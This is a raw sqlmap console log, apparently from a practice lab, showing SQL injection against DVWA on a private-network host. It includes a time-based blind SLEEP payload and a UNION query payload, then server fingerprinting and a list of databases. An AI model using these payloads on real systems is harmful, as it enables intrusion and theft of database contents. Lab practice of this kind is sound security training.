        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6#stable}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:36:47 /2022-04-24/

[12:36:47] [INFO] parsing HTTP request from '/home/kali/Documents/DVWA_user_blind_cookie.txt'
[12:36:47] [INFO] resuming back-end DBMS 'mysql' 
[12:36:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=134 AND (SELECT 4971 FROM (SELECT(SLEEP(5)))JFLd)&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=134 UNION ALL SELECT CONCAT(0x716a627a71,0x4b67426d75664b645950574b4e4a574b56786d71716d6f6473685a634c7a75486767686851755059,0x716a787671),NULL-- -&Submit=Submit
---
[12:36:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[12:36:47] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[12:36:47] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.18'

[*] ending @ 12:36:47 /2022-04-24/

